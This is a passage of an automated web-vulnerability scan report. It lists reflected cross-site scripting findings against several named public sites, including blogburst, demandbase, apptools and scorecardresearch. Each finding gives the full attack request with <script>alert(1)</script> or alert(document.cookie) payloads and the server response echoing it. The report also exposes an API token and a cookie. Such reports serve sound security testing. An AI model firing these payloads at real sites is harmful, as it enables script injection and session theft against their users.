Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 201

Error handler problem:
Error Number: B8BUa0w7Ilp7zBNRYRdWMLni
Error Path: /EntityImageHandler.ashxb4387(a)c27091d8173
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

4.61. http://api.blogburst.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://api.blogburst.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 80c92(a)e7e03c35472 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /favicon.ico80c92(a)e7e03c35472 HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 19:10:36 GMT
Content-Length: 189

Error handler problem:
Error Number: B83sUW5V9btfzEZ9C74xOolh
Error Path: /favicon.ico80c92(a)e7e03c35472
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

4.62. http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://api.blogburst.com
Path:	/v1.0/WidgetDeliveryProxy.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f5c81(a)8b15d9b73ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /v1.0/WidgetDeliveryProxy.jsf5c81(a)8b15d9b73ba HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:08 GMT
Content-Length: 205

Error handler problem:
Error Number: B80iwlBCmlTpz5Pig5CAws6o
Error Path: /v1.0/WidgetDeliveryProxy.jsf5c81(a)8b15d9b73ba
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

4.63. http://api.blogburst.com/v1.0/WidgetDeliveryProxyStub.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://api.blogburst.com
Path:	/v1.0/WidgetDeliveryProxyStub.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e8e6e(a)55b1a46fc7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /v1.0/WidgetDeliveryProxyStub.jse8e6e(a)55b1a46fc7 HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:19 GMT
Content-Length: 207

Error handler problem:
Error Number: B94M87SkpIdWCgjC0l2bFGg
Error Path: /v1.0/WidgetDeliveryProxyStub.jse8e6e(a)55b1a46fc7
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

4.64. http://api.blogburst.com/v1.0/WidgetDeliveryService.ashx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://api.blogburst.com
Path:	/v1.0/WidgetDeliveryService.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f4506(a)4a5cdf0844b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /v1.0f4506(a)4a5cdf0844b/WidgetDeliveryService.ashx?bbTransport=css&bbWidgetId=B7mDxwAeoI9czDO7YpXG1bi8&bbHostUrl=http%3A//www.ehow.com/computer-software/ HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
PluckOriginServer: psnapib
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:36 GMT
Content-Length: 209

Error handler problem:
Error Number: B8WJgPc8mOdez6tZwoiCJoTl
Error Path: /v1.0f4506(a)4a5cdf0844b/WidgetDeliveryService.ashx
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

4.65. http://api.blogburst.com/v1.0/WidgetDeliveryService.ashx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://api.blogburst.com
Path:	/v1.0/WidgetDeliveryService.ashx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8b1dc(a)5a857af5c5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /v1.0/WidgetDeliveryService.ashx8b1dc(a)5a857af5c5d?bbTransport=css&bbWidgetId=B7mDxwAeoI9czDO7YpXG1bi8&bbHostUrl=http%3A//www.ehow.com/computer-software/ HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
PluckOriginServer: psnapib
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:41 GMT
Content-Length: 208

Error handler problem:
Error Number: B7fOWSgosfbjAnIBtXULjlA
Error Path: /v1.0/WidgetDeliveryService.ashx8b1dc(a)5a857af5c5d
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

4.66. http://api.demandbase.com/api/v1/ip.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.demandbase.com
Path:	/api/v1/ip.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5fda3<script>alert(1)</script>05613b280fe was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/v1/ip.json?token=9629e1a2b682d7afd8c9cc104ad125c08fa0b490&callback=demandbase_parse5fda3<script>alert(1)</script>05613b280fe HTTP/1.1
Host: api.demandbase.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/privacy/2o7?f=2o7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Api-Version: v2
Content-Type: application/javascript;charset=utf-8
Date: Wed, 02 Feb 2011 19:10:46 GMT
Server: Apache
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Connection: keep-alive
Content-Length: 94

demandbase_parse5fda3<script>alert(1)</script>05613b280fe({"isp":true,"ip":"173.193.214.243"})

4.67. http://apptools.com/examples/tableheight.php. [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://apptools.com
Path:	/examples/tableheight.php.

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38302<script>alert(1)</script>c482f5e0c50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /examples38302<script>alert(1)</script>c482f5e0c50/tableheight.php. HTTP/1.1
Host: apptools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:18:40 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Length: 3788
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/examples38302<script>alert(1)</script>c482f5e0c50/tableheight.php was not able to be displayed.</p>
...[SNIP]...

4.68. http://apptools.com/examples/tableheight.php. [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://apptools.com
Path:	/examples/tableheight.php.

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c8e2a<script>alert(1)</script>5612df9d36a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /examples/tableheight.php.c8e2a<script>alert(1)</script>5612df9d36a HTTP/1.1
Host: apptools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:18:41 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Length: 3789
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/examples/tableheight.php.c8e2a<script>alert(1)</script>5612df9d36a was not able to be displayed.</p>
...[SNIP]...

4.69. http://apptools.com/examples/tableheight.php. [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://apptools.com
Path:	/examples/tableheight.php.

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 96edc<script>alert(1)</script>1447630590d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /examples/tableheight.php.?96edc<script>alert(1)</script>1447630590d=1 HTTP/1.1
Host: apptools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:18:40 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Length: 3792
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/examples/tableheight.php.?96edc<script>alert(1)</script>1447630590d=1 was not able to be displayed.</p>
...[SNIP]...

4.70. http://apptools.com/styles/apptools.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://apptools.com
Path:	/styles/apptools.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2523f<script>alert(1)</script>3ded236ecaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles2523f<script>alert(1)</script>3ded236ecaa/apptools.css HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:31 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5125

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/styles2523f<script>alert(1)</script>3ded236ecaa/apptools.css was not able to be displayed.</p>
...[SNIP]...

4.71. http://apptools.com/styles/apptools.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://apptools.com
Path:	/styles/apptools.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e507e<script>alert(1)</script>60df3ed154 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles/apptools.csse507e<script>alert(1)</script>60df3ed154 HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:41 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5124

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/styles/apptools.csse507e<script>alert(1)</script>60df3ed154 was not able to be displayed.</p>
...[SNIP]...

4.72. http://apptools.com/styles/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://apptools.com
Path:	/styles/print.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78363<script>alert(1)</script>31482200f99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles78363<script>alert(1)</script>31482200f99/print.css HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:29 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5122

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/styles78363<script>alert(1)</script>31482200f99/print.css was not able to be displayed.</p>
...[SNIP]...

4.73. http://apptools.com/styles/print.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://apptools.com
Path:	/styles/print.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7876d<script>alert(1)</script>1b072629eeb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles/print.css7876d<script>alert(1)</script>1b072629eeb HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:40 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5122

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/styles/print.css7876d<script>alert(1)</script>1b072629eeb was not able to be displayed.</p>
...[SNIP]...

4.74. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 9fb5f<script>alert(1)</script>bb7775bca59 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=39fb5f<script>alert(1)</script>bb7775bca59&c2=6035338&c3=5070033&c4=40443113&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:53 GMT
Date: Wed, 02 Feb 2011 15:31:53 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"39fb5f<script>alert(1)</script>bb7775bca59", c2:"6035338", c3:"5070033", c4:"40443113", c5:"59067898", c6:"", c10:"", c15:"", c16:"", r:""});

4.75. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload a97d8<script>alert(1)</script>9a0c4e010c5 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338a97d8<script>alert(1)</script>9a0c4e010c5&c3=5070033&c4=40443113&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:53 GMT
Date: Wed, 02 Feb 2011 15:31:53 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338a97d8<script>alert(1)</script>9a0c4e010c5", c3:"5070033", c4:"40443113", c5:"59067898", c6:"", c10:"", c15:"", c16:"", r:""});

4.76. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 29d7a<script>alert(1)</script>1b41605cfe3 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=507003329d7a<script>alert(1)</script>1b41605cfe3&c4=40443113&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
